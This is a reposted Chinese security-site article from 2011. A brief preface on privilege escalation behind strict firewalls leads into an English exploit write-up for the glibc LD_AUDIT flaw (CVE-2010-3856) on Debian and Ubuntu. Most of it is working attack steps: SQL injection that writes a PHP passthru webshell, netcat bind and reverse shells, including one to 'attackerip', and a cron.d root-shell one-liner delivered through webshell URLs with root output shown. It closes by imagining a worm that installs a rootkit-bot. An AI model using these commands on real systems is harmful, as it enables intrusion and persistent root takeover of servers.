频道栏目
首页 > 安全 > 系统安全 > 正文

linux非交互环境下本地提权思路与反思 linux localroot exploit

2011-01-13 11:53:42           
收藏   我要投稿

在iptables限制非常严格的时候,无法走icmp udp tcp的bind shell或connect back shell,又需要本地提权,root了之后关闭iptables,看看能否绕过访问控制手段(当然了,如果别人是硬件的防火墙,下文解决不了问题)。在这一场景下,可以考虑参考下文的非交互式本地提权的方法,或许还有其他linux localroot exploit也能实现,实战出真知。

另外有些时候不一定非得root的,nobody,非交互也能做非常多的事。

作为防御一方,面对这种场景,我们是否得反思

1、防御手段要与被防御系统分离,即使成功root了,依然难以快速渗透

2、我们对localroot是否有足够的事前的免疫能力,事中的发现能力及事后的定损取证能力?


Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root

# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date:   24-10-2010
# Author:   jmit
# Mail:   fhausberger[at]gmail[dot]com
# Tested on:   Debian 5.0.6
# CVE:   CVE-2010-3856

--------------
| DISCLAIMER |
--------------

# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

---------
| ABOUT |
---------

Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux
distros too.

--------------
| BACKGROUND |
--------------

Typically it isnt possible to use a suidshell or modify /etc/passwd directly after
webshell access (user nobody) to gain root access. But with the DSO vuln we can
launch commands as root and we can create a socket and connect to the user or setup
a bindshell.

-----------
| EXPLOIT |
-----------

After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
possible with select into dumpfile/outfile statement. The values are a simple
<? passthru($_GET[c]); ?> backdoor.

---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` (
`fm` longblob
) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile /opt/lampp/htdocs/xampp_backup.php;
drop table fm;
flush logs;
---

Now you can connect to the server and create a connection with telnet, nc, write
binary with perl -e print "x41x42x43x44", echo -en x41x42x43x44, ...
If direct shell access isnt possible you can use phpcode to create your own
binary with php fwrite:

---
<?php $File = "/tmp/nc";
$Handle = fopen($File, w);
$Data = "x41x42x43x44";
fwrite($Handle, $Data);
fclose($Handle); ?>
---

Now use

Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

in your webbrowser and connect to your shell

$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

---

Now lets exploit the DSO vuln. You need umask 0 for correct
rw-rw-rw creation of exploit /etc/cron.d/exploit

$ umask 0

This is the shellscript for the cron.d entry.

Bind-Shell: $ echo -e /bin/nc -l -p 79 -e /bin/bash > /tmp/exploit.sh
Reverse-Shell: $ echo -e /bin/nc localhost 8888 | /bin/bash > /tmp/exploit.sh

Now make your shellscript executable for cron:

$ chmod u+x /tmp/exploit.sh

Create rw-rw-rw file in cron directory using the setuid ping program:

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

Launch every minute a suid root shell

$ echo -e */1 * * * * root /tmp/exploit.sh > /etc/cron.d/exploit

Now you have a root shell every minute.

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

-------------------
| EXPLOIT oneline |
-------------------

echo -e /bin/nc -l -p 79 -e /bin/bash > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e */1 * * * * root /tmp/exploit.sh > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------
| EXPLOIT from webshell only |
------------------------------

http://victimip/xampp_backup.php?c=echo -e /bin/nc -l -p 79 -e /bin/bash > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e */1 * * * * root /tmp/exploit.sh > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------

http://victimip/xampp_backup.php?c=echo -e /bin/nc -l -p 79 -e /bin/bash > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e */1 * * * * root /tmp/exploit.sh > /etc/cron.d/exploit

$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------

Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.
Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.© Offensive Security 2010

相关TAG标签 思路 环境
上一篇:保护SSH 的三把锁(增加黑客入侵的难度)
下一篇:用Linux下的代理服务器保护主干网
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站